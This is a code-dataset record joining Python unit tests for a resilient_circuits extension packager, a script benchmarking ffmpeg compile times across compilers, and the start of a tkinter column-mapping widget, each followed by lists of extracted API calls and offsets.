with self.assertRaisesRegex(OSError, "Could not find valid icon file. Looked at two locations:"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_COMPANY_LOGO), "", 200, 72, "")
# Test not .png
with self.assertRaisesRegex(ExtException, ".jpg is not a supported icon file type. Icon file must be .png"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_to_corrupt_jpg_icon, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
# Test corrupt .png
with self.assertRaisesRegex(ExtException, "Icon file corrupt"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_to_corrupt_png_icon, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
# Test invalid resolution
with self.assertRaisesRegex(ExtException, "Resolution must be 10x10"):
self.ext_create_class.__get_icon__(os.path.basename(PATH_DEFAULT_ICON_EXTENSION_LOGO), path_extension_logo, 10, 10, PATH_DEFAULT_ICON_EXTENSION_LOGO)
def test_add_tag(self):
tag_name = MOCK_INTEGRATION_NAME
# Test adding the tag
tagged_md = self.ext_create_class.__add_tag__(tag_name, mock_message_destination_to_be_tagged)
self.assertEqual(tagged_md, mock_message_destination_tagged)
# Test invalid list_of_objs
with self.assertRaisesRegex(ExtException, "is not a List"):
self.ext_create_class.__add_tag__(tag_name, "")
def test_add_tag_to_import_definition(self):
tag_name = MOCK_INTEGRATION_NAME
supported_res_obj_names = self.ext_create_class.supported_res_obj_names
tagged_import_definition = self.ext_create_class.__add_tag_to_import_definition__(tag_name, supported_res_obj_names, mock_import_definition)
self.assertEqual(tagged_import_definition, mock_import_definition_tagged)
class ExtCreateClassTestCreateExtension(unittest.TestCase):
maxDiff = None
def setUp(self):
self.ext_create_class = ExtCreate("ext:package")
# Create temp dir
os.makedirs(path_temp_test_dir)
def tearDown(self):
# Remove temp dir
shutil.rmtree(path_temp_test_dir)
def create_the_extension(self, path_built_distribution):
return self.ext_create_class.create_extension(
path_setup_py_file=path_mock_setup_py_file,
path_customize_py_file=path_mock_customize_py_file,
path_config_py_file=path_mock_config_py_file,
output_dir=path_temp_test_dir,
path_built_distribution=path_built_distribution
)
def validate_creation(self, path_the_extension_zip):
path_created_extension_zip = os.path.join(path_temp_test_dir, "ext-fn_mock_integration-1.0.0.zip")
self.assertEqual(path_the_extension_zip, path_created_extension_zip)
self.assertTrue(zipfile.is_zipfile(path_the_extension_zip))
def validate_extension_zip_folder_structure(self, path_the_extension_zip):
# Open the zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as zip_file:
# Get a List of all the member names
zip_file_structure = zip_file.namelist()
self.assertEqual(zip_file_structure, mock_extension_zip_file_structure)
def validate_executables_folder_structure(self, path_the_extension_zip):
# Open the extension_zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as the_extension_zip_file:
# Extract the executables_zip
path_the_executable_zip_file = the_extension_zip_file.extract(member="executables/exe-{0}-1.0.0.zip".format(MOCK_INTEGRATION_NAME), path=path_temp_test_dir)
# Open the executables_zip
with zipfile.ZipFile(file=path_the_executable_zip_file, mode="r") as the_executable_zip_file:
the_executable_zip_file_structure = the_executable_zip_file.namelist()
self.assertEqual(the_executable_zip_file_structure, mock_executables_zip_file_structure)
def validate_export_res_and_extension_json(self, path_the_extension_zip):
# Get the mock data
mock_export_res = get_dict_from_json_file(path_mock_export_res)
mock_extension_json = get_dict_from_json_file(path_mock_extension_json)
# Extract the zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as zip_file:
zip_file.extractall(path=path_temp_test_dir)
# Get the export_res and extension_json
export_res = get_dict_from_json_file(os.path.join(path_temp_test_dir, "export.res"))
extension_json = get_dict_from_json_file(os.path.join(path_temp_test_dir, "extension.json"))
# Compare
self.assertEqual(export_res, mock_export_res)
self.assertEqual(mock_extension_json, extension_json)
def validate_executable_json(self, path_the_extension_zip):
# Get the mock data
mock_executable_json = get_dict_from_json_file(path_mock_exectuable_json)
# Open the extension_zip
with zipfile.ZipFile(file=path_the_extension_zip, mode="r") as the_extension_zip_file:
# Extract the executables_zip
path_the_executable_zip_file = the_extension_zip_file.extract(member="executables/exe-{0}-1.0.0.zip".format(MOCK_INTEGRATION_NAME), path=path_temp_test_dir)
# Open the executables_zip
with zipfile.ZipFile(file=path_the_executable_zip_file, mode="r") as the_executable_zip_file:
the_executable_zip_file.extractall(path=path_temp_test_dir)
# Get the executable.json
executable_json = get_dict_from_json_file(os.path.join(path_temp_test_dir, "executable.json"))
# Compare
self.assertEqual(executable_json, mock_executable_json)
#################
# Test TRUE TAR #
#################
def test_true_tar_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_true_tar_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_true_tar_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_true_tar_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_true_tar_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_tar)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
#################
# Test TRUE ZIP #
#################
def test_true_zip_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_true_zip_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_true_zip_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_true_zip_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_true_zip_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_true_zip)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
###################
# Test ZIPPED TAR #
###################
def test_zipped_tar_creation(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate creation
self.validate_creation(path_the_extension_zip)
def test_zipped_tar_valid_extension_zip_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate folder structure
self.validate_extension_zip_folder_structure(path_the_extension_zip)
def test_zipped_tar_valid_executables_folder_structure(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate folder structure
self.validate_executables_folder_structure(path_the_extension_zip)
def test_zipped_tar_valid_export_res_and_extension_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate export.res and extension.json
self.validate_export_res_and_extension_json(path_the_extension_zip)
def test_zipped_tar_valid_executables_json(self):
# Create the extension
path_the_extension_zip = self.create_the_extension(path_mock_bd_zipped_tar)
# Validate export.res and extension.json
self.validate_executable_json(path_the_extension_zip)
|
[
"zipfile.is_zipfile",
"copy.deepcopy",
"json.load",
"resilient_circuits.util.ext.ExtCreate.ExtCreate",
"os.makedirs",
"os.path.abspath",
"os.path.basename",
"zipfile.ZipFile",
"ext_tests.mock_data.mock_data.mock_import_definition.clear",
"os.path.realpath",
"shutil.rmtree",
"os.path.join"
] |
[((969, 1009), 'os.path.join', 'os.path.join', (['path_this_dir', '"""test_temp"""'], {}), "(path_this_dir, 'test_temp')\n", (981, 1009), False, 'import os\n'), ((1037, 1100), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""fn_mock_integration"""'], {}), "(path_this_dir, 'mock_data', 'fn_mock_integration')\n", (1049, 1100), False, 'import os\n'), ((1127, 1177), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""setup.py"""'], {}), "(path_fn_mock_integration, 'setup.py')\n", (1139, 1177), False, 'import os\n'), ((1208, 1297), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""fn_mock_integration"""', '"""util"""', '"""customize.py"""'], {}), "(path_fn_mock_integration, 'fn_mock_integration', 'util',\n 'customize.py')\n", (1220, 1297), False, 'import os\n'), ((1321, 1407), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""fn_mock_integration"""', '"""util"""', '"""config.py"""'], {}), "(path_fn_mock_integration, 'fn_mock_integration', 'util',\n 'config.py')\n", (1333, 1407), False, 'import os\n'), ((1428, 1540), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""true_tar_fn_mock_integration-1.0.0.tar.gz"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'true_tar_fn_mock_integration-1.0.0.tar.gz')\n", (1440, 1540), False, 'import os\n'), ((1561, 1670), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""true_zip_fn_mock_integration-1.0.0.zip"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'true_zip_fn_mock_integration-1.0.0.zip')\n", (1573, 1670), False, 'import os\n'), ((1693, 1804), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""built_distributions"""', '"""zipped_tar_fn_mock_integration-1.0.0.zip"""'], {}), "(path_this_dir, 'mock_data', 'built_distributions',\n 'zipped_tar_fn_mock_integration-1.0.0.zip')\n", (1705, 1804), False, 'import os\n'), ((1825, 1916), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""export.res"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'export.res')\n", (1837, 1916), False, 'import os\n'), ((1940, 2035), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""extension.json"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'extension.json')\n", (1952, 2035), False, 'import os\n'), ((2060, 2171), 'os.path.join', 'os.path.join', (['path_this_dir', '"""mock_data"""', '"""ext-fn_mock_integration-1.0.0"""', '"""executables"""', '"""executable.json"""'], {}), "(path_this_dir, 'mock_data', 'ext-fn_mock_integration-1.0.0',\n 'executables', 'executable.json')\n", (2072, 2171), False, 'import os\n'), ((920, 946), 'os.path.realpath', 'os.path.realpath', (['__file__'], {}), '(__file__)\n', (936, 946), False, 'import os\n'), ((2306, 2325), 'json.load', 'json.load', (['the_file'], {}), '(the_file)\n', (2315, 2325), False, 'import json\n'), ((2653, 2677), 'resilient_circuits.util.ext.ExtCreate.ExtCreate', 'ExtCreate', (['"""ext:package"""'], {}), "('ext:package')\n", (2662, 2677), False, 'from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO\n'), ((2720, 2757), 'copy.deepcopy', 'copy.deepcopy', (['mock_import_definition'], {}), '(mock_import_definition)\n', (2733, 2757), False, 'import copy\n'), ((2820, 2875), 'copy.deepcopy', 'copy.deepcopy', (['mock_message_destination_to_be_tagged[0]'], {}), '(mock_message_destination_to_be_tagged[0])\n', (2833, 2875), False, 'import copy\n'), ((2955, 2985), 'ext_tests.mock_data.mock_data.mock_import_definition.clear', 'mock_import_definition.clear', ([], {}), '()\n', (2983, 2985), False, 'from ext_tests.mock_data.mock_data import MOCK_INTEGRATION_NAME, MOCK_INTEGRATION_URL, MOCK_INTEGRATION_LONG_DESCRIPTION, mock_import_definition, mock_import_definition_tagged, mock_config_str, mock_config_list, mock_setup_py_file_lines, mock_parsed_setup_py_attributes, mock_icon_extension_logo, mock_icon_company_logo, mock_message_destination_to_be_tagged, mock_message_destination_tagged, mock_extension_zip_file_structure, mock_executables_zip_file_structure\n'), ((4954, 5023), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""extension_logo.png"""'], {}), "(path_fn_mock_integration, 'icons', 'extension_logo.png')\n", (4966, 5023), False, 'import os\n'), ((5052, 5119), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""company_logo.png"""'], {}), "(path_fn_mock_integration, 'icons', 'company_logo.png')\n", (5064, 5119), False, 'import os\n'), ((5156, 5228), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""mock_corrupt_icon.jpg"""'], {}), "(path_fn_mock_integration, 'icons', 'mock_corrupt_icon.jpg')\n", (5168, 5228), False, 'import os\n'), ((5264, 5336), 'os.path.join', 'os.path.join', (['path_fn_mock_integration', '"""icons"""', '"""mock_corrupt_icon.png"""'], {}), "(path_fn_mock_integration, 'icons', 'mock_corrupt_icon.png')\n", (5276, 5336), False, 'import os\n'), ((8583, 8607), 'resilient_circuits.util.ext.ExtCreate.ExtCreate', 'ExtCreate', (['"""ext:package"""'], {}), "('ext:package')\n", (8592, 8607), False, 'from resilient_circuits.util.ext.ExtCreate import ExtCreate, PATH_DEFAULT_ICON_EXTENSION_LOGO, PATH_DEFAULT_ICON_COMPANY_LOGO\n'), ((8643, 8674), 'os.makedirs', 'os.makedirs', (['path_temp_test_dir'], {}), '(path_temp_test_dir)\n', (8654, 8674), False, 'import os\n'), ((8734, 8767), 'shutil.rmtree', 'shutil.rmtree', (['path_temp_test_dir'], {}), '(path_temp_test_dir)\n', (8747, 8767), False, 'import shutil\n'), ((9271, 9340), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""ext-fn_mock_integration-1.0.0.zip"""'], {}), "(path_temp_test_dir, 'ext-fn_mock_integration-1.0.0.zip')\n", (9283, 9340), False, 'import os\n'), ((394, 419), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (409, 419), False, 'import os\n'), ((3024, 3070), 'copy.deepcopy', 'copy.deepcopy', (['self.original_import_definition'], {}), '(self.original_import_definition)\n', (3037, 3070), False, 'import copy\n'), ((3240, 3306), 'copy.deepcopy', 'copy.deepcopy', (['self.original_mock_message_destination_to_be_tagged'], {}), '(self.original_mock_message_destination_to_be_tagged)\n', (3253, 3306), False, 'import copy\n'), ((5446, 5496), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (5462, 5496), False, 'import os\n'), ((5756, 5806), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (5772, 5806), False, 'import os\n'), ((6037, 6085), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6053, 6085), False, 'import os\n'), ((6334, 6382), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6350, 6382), False, 'import os\n'), ((9443, 9485), 'zipfile.is_zipfile', 'zipfile.is_zipfile', (['path_the_extension_zip'], {}), '(path_the_extension_zip)\n', (9461, 9485), False, 'import zipfile\n'), ((9603, 9657), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (9618, 9657), False, 'import zipfile\n'), ((9978, 10032), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (9993, 10032), False, 'import zipfile\n'), ((10320, 10380), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_executable_zip_file', 'mode': '"""r"""'}), "(file=path_the_executable_zip_file, mode='r')\n", (10335, 10380), False, 'import zipfile\n'), ((10889, 10943), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (10904, 10943), False, 'import zipfile\n'), ((11108, 11154), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""export.res"""'], {}), "(path_temp_test_dir, 'export.res')\n", (11120, 11154), False, 'import os\n'), ((11205, 11255), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""extension.json"""'], {}), "(path_temp_test_dir, 'extension.json')\n", (11217, 11255), False, 'import os\n'), ((11614, 11668), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_extension_zip', 'mode': '"""r"""'}), "(file=path_the_extension_zip, mode='r')\n", (11629, 11668), False, 'import zipfile\n'), ((11956, 12016), 'zipfile.ZipFile', 'zipfile.ZipFile', ([], {'file': 'path_the_executable_zip_file', 'mode': '"""r"""'}), "(file=path_the_executable_zip_file, mode='r')\n", (11971, 12016), False, 'import zipfile\n'), ((12202, 12253), 'os.path.join', 'os.path.join', (['path_temp_test_dir', '"""executable.json"""'], {}), "(path_temp_test_dir, 'executable.json')\n", (12214, 12253), False, 'import os\n'), ((6686, 6734), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_COMPANY_LOGO'], {}), '(PATH_DEFAULT_ICON_COMPANY_LOGO)\n', (6702, 6734), False, 'import os\n'), ((6942, 6992), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (6958, 6992), False, 'import os\n'), ((7210, 7260), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (7226, 7260), False, 'import os\n'), ((7491, 7541), 'os.path.basename', 'os.path.basename', (['PATH_DEFAULT_ICON_EXTENSION_LOGO'], {}), '(PATH_DEFAULT_ICON_EXTENSION_LOGO)\n', (7507, 7541), False, 'import os\n')]
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import os, sys, shutil, platform
import urllib.request
import subprocess
import tarfile
import cpuinfo.cpuinfo as cpuinfo
import time
import statistics
def check_deps(args):
if shutil.which('yasm') == None and shutil.which('yasm.exe') == None:
print('yasm is not installed or in the PATH')
sys.exit(-2)
for command in args:
if shutil.which(command) == None:
print('Cannot find ' + command + ' executable')
sys.exit(-3)
def download_and_extract_ffmpeg():
print('\nDownloading ffmpeg sources...')
url = 'http://ffmpeg.org/releases/ffmpeg-2.8.4.tar.gz'
file_name = url.split('/')[-1]
if not os.path.isfile(file_name):
f = open( file_name, 'wb' )
with urllib.request.urlopen(url) as d:
f.write( d.read() )
f.close()
print('Source code downloaded!\n')
decompress_file(file_name)
def decompress_file(file_name):
print('Decompressing sources...')
compressedFile = tarfile.open(file_name, 'r:gz')
compressedFile.extractall()
compressedFile.close()
print('Sources decompressed!')
os.chdir(file_name.split('.tar')[0])
def configure(compiler):
conf = './configure --disable-doc --cc=' + compiler
FNULL = open(os.devnull, 'w')
try:
subprocess.check_call(conf.split(), stdout=FNULL, \
stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
print('Error using ./configure: {0}'.format(err))
sys.exit(-4)
def compile():
make = 'make'
FNULL = open(os.devnull, 'w')
try:
subprocess.check_call(make, stdout=FNULL, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
print('Error compiling: {1}'.format(compiler, err))
sys.exit(-5)
def clean():
make = 'make clean'
FNULL = open(os.devnull, 'w')
subprocess.call(make.split(),stdout=FNULL, stderr=subprocess.STDOUT)
def greeting():
print('/*****************************************************************/')
print('/* Benchmark to test compile times */')
print('/* with diferent compilers using ffmpeg */')
print('/*****************************************************************/')
try:
import matplotlib.pyplot as plt
plt.rcdefaults()
except ImportError as err:
print('\nTo generate a graph of the stadistics you need to have installed matplotlib')
def show_results(names, times):
print('\nReview of the results:')
print('Operating system: {0}'.format(platform.system_alias( \
platform.system(), platform.release(), platform.version())))
print( 'Processor: {0}'.format( cpuinfo.get_cpu_info().get('brand','') ) )
for i in range(len(names)):
print('\nStatistics of {0}'.format(names[i]))
print('Number of iterations: {0}'.format(len(times[i])))
print('min: {0}'.format(min(times[i])))
print('mean: {0} seconds'.format(statistics.mean(times[i])))
print('+/- stdev: {0}'.format(statistics.stdev(times[i])))
print('max: {0}'.format(max(times[i])))
print('median: {0} seconds'.format(statistics.median_high(times[i])))
def main():
greeting()
if len(sys.argv) < 3:
print('\nUsage: python {0} <compiler 1> ... \
<number of samples>'.format(sys.argv[0]))
sys.exit(-1)
compilers = sys.argv[1:-1]
iterations = int(sys.argv[-1])
print('\n')
names = []
for comp in compilers:
names.append(input('Give a name for the \
statistics of {0}: '.format(comp)))
check_deps(compilers)
download_and_extract_ffmpeg()
times = []
for x in range(len(compilers)):
print('\nStarting configuration for {0}'.format(compilers[x]))
configure(comp)
times.append([])
for i in range(1, iterations + 1):
print('Compiling ffmpeg with {0}. {1}º \
time'.format(compilers[x], i))
start = time.time()
compile()
end = time.time()
times[x].append(end-start)
clean()
cwd = os.getcwd()
os.chdir('..')
shutil.rmtree(cwd)
show_results(names, times)
try:
import matplotlib.pyplot as plt
plt.rcdefaults()
import numpy as np
import matplotlib.pyplot as plt
y_pos = np.arange(len(compilers))
means = []
stdevs = []
for i in range(len(compilers)):
means.append(statistics.mean(times[i]))
stdevs.append(statistics.stdev(times[i]))
plt.barh(y_pos, means, xerr=stdevs, align='center', alpha=0.4)
plt.yticks(y_pos, names)
plt.xlabel('Compiling mean time(seconds)')
plt.title('Compiling times for ffmpeg')
fig = plt.gcf()
fig.savefig('Results.png', dpi=fig.dpi)
print('\nStatistics saved as Results.png')
except ImportError as err:
print('\nTo generate a graph of the stadistics you need to have installed matplotlib')
if __name__ == "__main__":
main()
|
[
"matplotlib.pyplot.title",
"cpuinfo.cpuinfo.get_cpu_info",
"os.path.isfile",
"platform.release",
"shutil.rmtree",
"os.chdir",
"subprocess.check_call",
"matplotlib.pyplot.yticks",
"matplotlib.pyplot.rcdefaults",
"tarfile.open",
"statistics.median_high",
"statistics.stdev",
"shutil.which",
"matplotlib.pyplot.barh",
"statistics.mean",
"platform.system",
"platform.version",
"matplotlib.pyplot.gcf",
"sys.exit",
"os.getcwd",
"time.time",
"matplotlib.pyplot.xlabel"
] |
[((1035, 1066), 'tarfile.open', 'tarfile.open', (['file_name', '"""r:gz"""'], {}), "(file_name, 'r:gz')\n", (1047, 1066), False, 'import tarfile\n'), ((4203, 4214), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (4212, 4214), False, 'import os, sys, shutil, platform\n'), ((4219, 4233), 'os.chdir', 'os.chdir', (['""".."""'], {}), "('..')\n", (4227, 4233), False, 'import os, sys, shutil, platform\n'), ((4238, 4256), 'shutil.rmtree', 'shutil.rmtree', (['cwd'], {}), '(cwd)\n', (4251, 4256), False, 'import os, sys, shutil, platform\n'), ((357, 369), 'sys.exit', 'sys.exit', (['(-2)'], {}), '(-2)\n', (365, 369), False, 'import os, sys, shutil, platform\n'), ((710, 735), 'os.path.isfile', 'os.path.isfile', (['file_name'], {}), '(file_name)\n', (724, 735), False, 'import os, sys, shutil, platform\n'), ((1635, 1702), 'subprocess.check_call', 'subprocess.check_call', (['make'], {'stdout': 'FNULL', 'stderr': 'subprocess.STDOUT'}), '(make, stdout=FNULL, stderr=subprocess.STDOUT)\n', (1656, 1702), False, 'import subprocess\n'), ((2386, 2402), 'matplotlib.pyplot.rcdefaults', 'plt.rcdefaults', ([], {}), '()\n', (2400, 2402), True, 'import matplotlib.pyplot as plt\n'), ((3442, 3454), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (3450, 3454), False, 'import os, sys, shutil, platform\n'), ((4346, 4362), 'matplotlib.pyplot.rcdefaults', 'plt.rcdefaults', ([], {}), '()\n', (4360, 4362), True, 'import matplotlib.pyplot as plt\n'), ((4668, 4730), 'matplotlib.pyplot.barh', 'plt.barh', (['y_pos', 'means'], {'xerr': 'stdevs', 'align': '"""center"""', 'alpha': '(0.4)'}), "(y_pos, means, xerr=stdevs, align='center', alpha=0.4)\n", (4676, 4730), True, 'import matplotlib.pyplot as plt\n'), ((4739, 4763), 'matplotlib.pyplot.yticks', 'plt.yticks', (['y_pos', 'names'], {}), '(y_pos, names)\n', (4749, 4763), True, 'import matplotlib.pyplot as plt\n'), ((4772, 4814), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Compiling mean time(seconds)"""'], {}), "('Compiling mean time(seconds)')\n", (4782, 4814), True, 'import matplotlib.pyplot as plt\n'), ((4823, 4862), 'matplotlib.pyplot.title', 'plt.title', (['"""Compiling times for ffmpeg"""'], {}), "('Compiling times for ffmpeg')\n", (4832, 4862), True, 'import matplotlib.pyplot as plt\n'), ((4877, 4886), 'matplotlib.pyplot.gcf', 'plt.gcf', ([], {}), '()\n', (4884, 4886), True, 'import matplotlib.pyplot as plt\n'), ((228, 248), 'shutil.which', 'shutil.which', (['"""yasm"""'], {}), "('yasm')\n", (240, 248), False, 'import os, sys, shutil, platform\n'), ((261, 285), 'shutil.which', 'shutil.which', (['"""yasm.exe"""'], {}), "('yasm.exe')\n", (273, 285), False, 'import os, sys, shutil, platform\n'), ((407, 428), 'shutil.which', 'shutil.which', (['command'], {}), '(command)\n', (419, 428), False, 'import os, sys, shutil, platform\n'), ((510, 522), 'sys.exit', 'sys.exit', (['(-3)'], {}), '(-3)\n', (518, 522), False, 'import os, sys, shutil, platform\n'), ((1537, 1549), 'sys.exit', 'sys.exit', (['(-4)'], {}), '(-4)\n', (1545, 1549), False, 'import os, sys, shutil, platform\n'), ((1820, 1832), 'sys.exit', 'sys.exit', (['(-5)'], {}), '(-5)\n', (1828, 1832), False, 'import os, sys, shutil, platform\n'), ((4069, 4080), 'time.time', 'time.time', ([], {}), '()\n', (4078, 4080), False, 'import time\n'), ((4121, 4132), 'time.time', 'time.time', ([], {}), '()\n', (4130, 4132), False, 'import time\n'), ((2672, 2689), 'platform.system', 'platform.system', ([], {}), '()\n', (2687, 2689), False, 'import os, sys, shutil, platform\n'), ((2691, 2709), 'platform.release', 'platform.release', ([], {}), '()\n', (2707, 2709), False, 'import os, sys, shutil, platform\n'), ((2711, 2729), 'platform.version', 'platform.version', ([], {}), '()\n', (2727, 2729), False, 'import os, sys, shutil, platform\n'), ((3054, 3079), 'statistics.mean', 'statistics.mean', (['times[i]'], {}), '(times[i])\n', (3069, 3079), False, 'import statistics\n'), ((3120, 3146), 'statistics.stdev', 'statistics.stdev', (['times[i]'], {}), '(times[i])\n', (3136, 3146), False, 'import statistics\n'), ((3240, 3272), 'statistics.median_high', 'statistics.median_high', (['times[i]'], {}), '(times[i])\n', (3262, 3272), False, 'import statistics\n'), ((4578, 4603), 'statistics.mean', 'statistics.mean', (['times[i]'], {}), '(times[i])\n', (4593, 4603), False, 'import statistics\n'), ((4631, 4657), 'statistics.stdev', 'statistics.stdev', (['times[i]'], {}), '(times[i])\n', (4647, 4657), False, 'import statistics\n'), ((2769, 2791), 'cpuinfo.cpuinfo.get_cpu_info', 'cpuinfo.get_cpu_info', ([], {}), '()\n', (2789, 2791), True, 'import cpuinfo.cpuinfo as cpuinfo\n')]
|
"""
Created on Feb 5, 2014
@author: <NAME>
"""
from tkinter import IntVar, StringVar, ttk, BooleanVar
from tkinter.constants import LEFT, X, RIGHT
from qal.common.strings import bool_to_binary_int, binary_int_to_bool, empty_when_none
from qal.tools.gui.frame_list import FrameCustomItem
__author__ = 'nibo'
class FrameMapping(FrameCustomItem):
"""Holds and visualizes a Map between two columns of different datasets"""
row_index = None
is_key = None
src_reference = None
src_datatype = None
src_cast_to = None
dest_table = None
curr_data = None
curr_raw_data = None
mapping = None
preview = None
dest_reference = None
def __init__(self, _master, _mapping = None,
_on_get_source_references = None,
_on_get_destination_references = None,
_on_select = None):
super(FrameMapping, self).__init__(_master)
# Add monitored variables.
self.is_key = BooleanVar()
self.src_reference = StringVar()
self.src_datatype = StringVar()
self.curr_data = StringVar()
self.result_cast_to = StringVar()
self.preview = StringVar()
self.dest_reference = StringVar()
self.on_get_source_references = _on_get_source_references
self.on_get_destination_references = _on_get_destination_references
self.on_select = _on_select
self.init_widgets()
self.mapping = _mapping
if _mapping is not None:
self.mapping_to_gui()
def mapping_to_gui(self):
self.src_reference.set(str(empty_when_none(self.mapping.src_reference)))
self.dest_reference.set(str(empty_when_none(self.mapping.dest_reference)))
self.src_datatype.set(self.mapping.src_datatype)
self.is_key.set(bool_to_binary_int(self.mapping.is_key))
def gui_to_mapping(self):
self.mapping.src_reference = self.src_reference.get()
self.mapping.dest_reference = self.dest_reference.get()
self.mapping.is_key = binary_int_to_bool(self.is_key.get())
def reload_references(self):
self.cb_source_ref['values'] = self.get_source_references()
self.cb_dest_ref['values'] = self.get_destination_references()
def get_source_references(self, _force = None):
if self.on_get_source_references:
return self.on_get_source_references(_force)
def get_destination_references(self, _force = None):
if self.on_get_destination_references:
return self.on_get_destination_references( _force)
def on_change_source_ref(self, *args):
# reload dataset.
pass
def init_widgets(self):
"""Init all widgets"""
# Source reference
self.cb_source_ref = ttk.Combobox(self, textvariable=self.src_reference, state='normal')
self.cb_source_ref['values'] = self.get_source_references()
